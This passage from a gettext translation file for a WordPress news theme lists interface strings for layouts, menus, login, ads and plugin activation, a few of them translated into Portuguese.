%1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to " "display only one in listings." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking " "for does not exist or was loading incorrectly." msgstr "" #: templates/blog.php:501 msgid "" "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" "Parece que não conseguimos encontrar o que você está procurando. Talvez " "pesquisar possa ajudar." #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured Image" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "Deixe um comentário" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "" "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/blog-pages.php:694 msgid "" "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can " "embed this font icons to your widgets and content." msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "Esqueceu sua senha?" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/typography.php:902 functions.php:56 #: templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/typography.php:947 functions.php:57 #: templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "Mais resultados" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile " "device." msgstr "" #: backend/panels/heading.php:42 msgid "" "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the " "font values." msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: templates/parts.php:114 msgid "" "No found posts, Please add a new post for this query or change the block " "settings: " msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/class-tgm-plugin-activation.php:3028 msgid "No plugins are available to be activated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2894 msgid "No plugins are available to be installed at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2896 msgid "No plugins are available to be updated at this time." msgstr "" #: backend/class-tgm-plugin-activation.php:2627 msgid "No plugins to install, update or activate." msgstr "" #: backend/class-tgm-plugin-activation.php:3002 msgid "No plugins were selected to be activated. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2851 msgid "No plugins were selected to be installed. No action taken." msgstr "" #: backend/class-tgm-plugin-activation.php:2853 msgid "No plugins were selected to be updated. No action taken." msgstr "" #: backend/configs.php:168 backend/configs.php:543 msgid "No Sidebar" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/blog-pages.php:53 backend/panels/blog-pages.php:619 #: backend/panels/blog-pages.php:1937 backend/panels/design.php:276 #: backend/panels/header-style.php:74 backend/panels/header-style.php:622 #: backend/single-metaboxes.php:136 backend/single-metaboxes.php:913 msgid "None" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/class-tgm-plugin-activation.php:2409 msgid "Not Installed" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: backend/panels/single-post.php:1361 msgid "Number of Posts" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: backend/category-settings.php:470 backend/category-settings.php:500 #: backend/configs.php:254 backend/panels/blog-pages.php:494 #: backend/panels/blog-pages.php:524 backend/panels/blog-pages.php:981 #: backend/panels/blog-pages.php:1011 backend/panels/blog-pages.php:1395 #: backend/panels/blog-pages.php:1425 backend/panels/blog-pages.php:1803 #: backend/panels/blog-pages.php:1833 backend/panels/blog-pages.php:2295 #: backend/panels/blog-pages.php:2325 backend/panels/bookmark.php:393 #: backend/panels/bookmark.php:841 msgid "On Mobile" msgstr "" #: backend/category-settings.php:471 backend/category-settings.php:501 #: backend/configs.php:255 backend/panels/blog-pages.php:495 #: backend/panels/blog-pages.php:525 backend/panels/blog-pages.php:982 #: backend/panels/blog-pages.php:1012 backend/panels/blog-pages.php:1396 #: backend/panels/blog-pages.php:1426 backend/panels/blog-pages.php:1804 #: backend/panels/blog-pages.php:1834 backend/panels/blog-pages.php:2296 #: backend/panels/blog-pages.php:2326 backend/panels/bookmark.php:394 #: backend/panels/bookmark.php:842 msgid "On Tablet" msgstr "" #: backend/category-settings.php:472 backend/category-settings.php:502 #: backend/configs.php:256 backend/panels/blog-pages.php:496 #: backend/panels/blog-pages.php:526 backend/panels/blog-pages.php:983 #: backend/panels/blog-pages.php:1013 backend/panels/blog-pages.php:1397 #: backend/panels/blog-pages.php:1427 backend/panels/blog-pages.php:1805 #: backend/panels/blog-pages.php:1835 backend/panels/blog-pages.php:2297 #: backend/panels/blog-pages.php:2327 backend/panels/bookmark.php:395 #: backend/panels/bookmark.php:843 msgid "On Tablet & Mobile" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 #: includes/sidebars.php:124 includes/sidebars.php:134 #: includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/panels/blog-pages.php:1901 msgid "Only display posts in the search results." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "Ops! Nada aqui" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "" "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config " "for the blog page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/single-post.php:586 msgid "" "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the " "default." msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/adblock.php:35 msgid "" "Our site is an advertising supported site. Please whitelist to support our " "site." msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design " "> Font Awesome\" if you use this font icon classname." msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML " "vulnerabilities." msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for " "setting up background, color and other settings." msgstr "" #: backend/panels/newsletter.php:21 msgid "" "Please update cover images to your own images after importing the theme demo." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 